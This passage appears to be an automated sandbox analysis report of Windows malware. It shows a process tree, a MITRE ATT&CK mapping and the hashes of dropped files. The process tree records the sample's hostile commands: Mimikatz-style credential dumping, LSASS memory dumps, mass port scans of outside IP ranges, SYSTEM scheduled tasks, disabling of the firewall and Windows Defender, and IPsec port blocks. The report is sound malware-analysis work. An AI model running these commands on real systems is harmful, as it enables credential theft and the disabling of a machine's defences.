        System Location Discovery: System Language Discovery
        
        PID:4912
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4472
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4808
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:3412
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1800
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1796
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1468
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:4624
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3256
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3544
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:264
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:440
- - C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe
    C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1248
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ppgkyibiq\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:4752
- - C:\Windows\ppgkyibiq\Corporate\vfshost.exe
    C:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"
  2⤵
  PID:3820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3596
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4852
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2256
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1200
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"
  2⤵
  PID:2984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2568
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "blhbujgqb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5068
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3176
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:468
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:396
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1704
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4744
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3436
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4928
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2880
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1188
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1644
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2324
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1532
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4016
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3300
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:1600
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3724
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:3148
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 796 C:\Windows\TEMP\ppgkyibiq\796.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3076
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:3920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1496
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4884
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:3988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1968
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2512
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:3616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  PID:744
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:1908
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      PID:4024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:2120
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:2552
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2892
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1200
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3124
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4832
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3716
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:972
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4476
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 384 C:\Windows\TEMP\ppgkyibiq\384.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4932
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2236 C:\Windows\TEMP\ppgkyibiq\2236.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1112
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2680 C:\Windows\TEMP\ppgkyibiq\2680.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1732
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2852 C:\Windows\TEMP\ppgkyibiq\2852.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2284
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2864 C:\Windows\TEMP\ppgkyibiq\2864.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1468
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 1504 C:\Windows\TEMP\ppgkyibiq\1504.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:216
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3808 C:\Windows\TEMP\ppgkyibiq\3808.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4900
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3900 C:\Windows\TEMP\ppgkyibiq\3900.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3824
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 3964 C:\Windows\TEMP\ppgkyibiq\3964.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3156
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 4048 C:\Windows\TEMP\ppgkyibiq\4048.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:512
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2724 C:\Windows\TEMP\ppgkyibiq\2724.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4168
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 4188 C:\Windows\TEMP\ppgkyibiq\4188.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2484
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 1304 C:\Windows\TEMP\ppgkyibiq\1304.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4960
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 1616 C:\Windows\TEMP\ppgkyibiq\1616.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1708
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 4212 C:\Windows\TEMP\ppgkyibiq\4212.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5100
- C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe
  C:\Windows\TEMP\ppgkyibiq\btjlhtrlh.exe -accepteula -mp 2200 C:\Windows\TEMP\ppgkyibiq\2200.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3572
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\ppgkyibiq\ihnqsqiep\scan.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1532
- - C:\Windows\ppgkyibiq\ihnqsqiep\vmlbqggye.exe
    vmlbqggye.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4928

C:\Windows\SysWOW64\fknvgk.exe
C:\Windows\SysWOW64\fknvgk.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3972

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
1⤵
PID:2720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:3420
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
  2⤵
  PID:548

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\yittybr.exe
1⤵
PID:740
- C:\Windows\ime\yittybr.exe
  C:\Windows\ime\yittybr.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4624

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
1⤵
PID:1092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1880
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
  2⤵
  PID:4908

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\yittybr.exe
1⤵
PID:4220
- C:\Windows\ime\yittybr.exe
  C:\Windows\ime\yittybr.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1012

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
1⤵
PID:6124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1572
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F
  2⤵
  PID:2340

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
1⤵
PID:4912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5140
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\lntjubmbe\ttlnnh.exe /p everyone:F
  2⤵
  PID:5344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\lntjubmbe\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\ppgkyibiq\1304.dmp

Filesize
8.6MB

MD5
c364b1f2508051cdb28d2a26f7da7943

SHA1
ce7f1e0577e2e0b18024df53225a61d8fb5525f7

SHA256
21cf5610c458eae83d98c5484b71093ebc7babd3f1236ee30cb16ff6f9c69e5b

SHA512
e911f4b4ffc5f85cae37718cdc521f8309d9a8a86278c26e8d41e4dca24890748842729fae6ef032ee8246b9f4e2b7c85923928c65ecb288b7d7af545382e220

Download Submit
C:\Windows\TEMP\ppgkyibiq\1504.dmp

Filesize
792KB

MD5
b258d89980f6d79e040ec85fe330d727

SHA1
7399b45e8300ccc2e563cb53f68b11b84548ea38

SHA256
119b0e4ebf33867128b63c3b52056c27e02f93a3248dc036d57834e4a6c25c33

SHA512
cb5ec57cbe90afddfd4e1503e776e764b325ee10aaff4433d6f70ffa0844b22ab74ba3fa5f32b9d2edb748b6aaef853136bf0bd3a0c744586da780e685994010

Download Submit
C:\Windows\TEMP\ppgkyibiq\2236.dmp

Filesize
4.2MB

MD5
46e1882b7140f361734dc139cee33d1e

SHA1
da68c46c28bbffc6600ac5f51055228de55aa8f9

SHA256
8f3303146d8dd6bd711e6531c98385922678ebcf29bc9587cfa4f2caf53c0509

SHA512
8e684cf3cf96d077a5fb4d68322ad2a36111f6969e86c82757f1be887b8f9abe6fab34052b198cf7990fa4b49887298039cbd21b0037feddbace0d386c7e0a78

Download Submit
C:\Windows\TEMP\ppgkyibiq\2680.dmp

Filesize
3.6MB

MD5
73cfb36710078c29f9613c2870ebc0d1

SHA1
5a7b7af1e7885402987defecb58cefb662892722

SHA256
48f56ffd40e6be147330d7b13054c23b8cf039c00bddf885905f03c914821109

SHA512
c2f96cffb32b2e8bfe0ac8018c65cbdaa4dd285b0f6cd07c0b78848cd0f456e6723687bd7b88ffe7913a1ecba9385921df76534861df9ffb25627dc5d9b1d3d1

Download Submit
C:\Windows\TEMP\ppgkyibiq\2724.dmp

Filesize
26.4MB

MD5
a6caa53539cdf3a8aba5faa84ffd958c

SHA1
8f0ad028b03b47c05676e59bf0d79207885997c0

SHA256
e163da2d2bc94a4227a461f697e0099d2020eed73ebe063f5974ccddb5acc944

SHA512
e657f32884478e8dc70b32173bac2cb6049b8ce9382103b3616f61b8cd90cac06ba065029e86dfa0a2bcaafd8877884ab2a23e5f9df3587ca2ab82bcb3de7aa5

Download Submit
C:\Windows\TEMP\ppgkyibiq\2852.dmp

Filesize
7.5MB

MD5
ca38b75234e0db8ca3eddfc6630f0c26

SHA1
163592367877fd28e5531a941396d5cba0816f53

SHA256
669929f505c1b2ea8dc763546e14de67df24b778e10750f38c4cd819d04dbaee

SHA512
23d7267f8d3470ec7f9d207e696c5f07f12af4541c0e63deea1001689ed47c6b36deba39de17f1b315065168a64b6d3f69dd9435066bf32ce705fd988e91dd86

Download Submit
C:\Windows\TEMP\ppgkyibiq\2864.dmp

Filesize
2.9MB

MD5
e53fe4875040ef65d9357c2fb8caa97b

SHA1
4f0e3b68cd53381fba1413443e569aaae5709076

SHA256
ddc6d83205e0ee2f5a13a444e29aa8cd34ee5a3c4fe6f7b67ce7ce3c7266c0d1

SHA512
e44a6d5647ea7e2bcd65f62d60decf5fd6dc53d2ea5fa360ec02a8713c39cbe041ae01183306b1258bf18d0c0eccb457f26afd0f4267f3823216dbe4039ae8ab

Download Submit
C:\Windows\TEMP\ppgkyibiq\3808.dmp

Filesize
2.3MB

MD5
d0b1a731135fe94fb2e49ad4dea0a4cc

SHA1
a5d19f3430249aa4dd6a4ff752506c06b9e0f70f

SHA256
0a143761c35677ca0870d89ad6addaeda4463e1cdbefe3ca04b09acb01bebb0f

SHA512
98648049002cd937c70ba31098c8daf6fed52b40c9982405f8eff9a80a4872bfaa4dbdb1e64bb17be45a1d8a799efcebd83a0f3239dbefbc245c74d9b2302c48

Download Submit
C:\Windows\TEMP\ppgkyibiq\384.dmp

Filesize
33.3MB

MD5
fd49b2b5ae8c39d9731c8693d73ffcd7

SHA1
a738dc5579201af12d79077c01e5161c3878a982

SHA256
3608aeed1e1f036b50237f8fc57778d42da029b899a4ec5c99f5e6d0d1490a31

SHA512
4a04a710ea506a272105f508b9785f88e934f4f641eeecd64cd068c4f1d4c0b46e897ce154da6d24189c180e163ebc75c4636aceada63566fe965b98ea6ba2fa

Download Submit
C:\Windows\TEMP\ppgkyibiq\3900.dmp

Filesize
20.7MB

MD5
6ad88bb2812c223595b6565aab6f6ad3

SHA1
caea16d28def964ec31d8b2609fd5cb67ee982a7

SHA256
3b43240de2af8280e9063a7cb97a9d82bf806f52da75bdc0dd1cc8f68fbf9223

SHA512
90d8ea360241216e1f23eb58193a1e95e656cd84abb0b610faf3bd5a62ff6cf27a6a6b3aa61f6fe5489fd4f0a5c6b8b99bb5fb5f92bd0e858fe5e5c360ded474

Download Submit
C:\Windows\TEMP\ppgkyibiq\3964.dmp

Filesize
4.1MB

MD5
6c1125436390f5c26af39ff467639236

SHA1
90c50b1775330c363058578c5ff7b8abd0990bc6

SHA256
102025caeb05a16c6d592081495c5ec188070ee60e07dfb512a64e3f46985e55

SHA512
2ea646b551301b5a6a7971a88b87b3091ae1f0c985aea96eb5073774a494d315aeff3290ef24bea1b8b610902f8ae29cc431de5ac83b90aef7613cdea0b19e87

Download Submit
C:\Windows\TEMP\ppgkyibiq\4048.dmp

Filesize
43.8MB

MD5
bd63de806b6edb9bc492898d2e6d71a0

SHA1
d18c34678fd72397ab08ae85de6d9800ccdc7b90

SHA256
bfc70afd123fda3548e4c0357d36b2f96c6c1a1c3b2deec9925f34264e31cc6e

SHA512
6d345cb1ab84fbdaea31fc238d4f732c9819e72d63df2a163cb8459f6085eedec8a2205fef293bb7910084ab7dbbee8e4224a109c8ac59732eeba2a2117f057f

Download Submit
C:\Windows\TEMP\ppgkyibiq\4188.dmp

Filesize
1.2MB

MD5
7273397a84faf24f963fc5fd461fbfe0

SHA1
6df85fb62384b7e892dd27bccac59becd3beb810

SHA256
8db5592580dd9d2c3667b959ac1880be9cf17a37b2f3eeccf8158fa77b612f9f

SHA512
7e19b6602059ca5af58d8c7a1a51ffac23647eaec26b99d9ce3eeda472b77386fdfc0db4c14b5e63574e90bc474116d647d3001759f62d9122816753fb091454

Download Submit
C:\Windows\TEMP\ppgkyibiq\796.dmp

Filesize
1019KB

MD5
8a187968488752d29b8f33a9bb48efec

SHA1
f2b1ae104da48c82583086adc8713f7a3feb4ee6

SHA256
f886bae30672a62a728d33c276eb339b78b1a1fbfb24605cdff02f6ba2849bd8

SHA512
ca9527ebad323532746866a83bb367c50db2f895a073e56ed2eef38fc5a18850c3d62e3befdfa5b1a1c5d0e411593b094d78ca31b3759d3dacd0332ee6384494

Download Submit
C:\Windows\Temp\lntjubmbe\ttlnnh.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\nsa2008.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
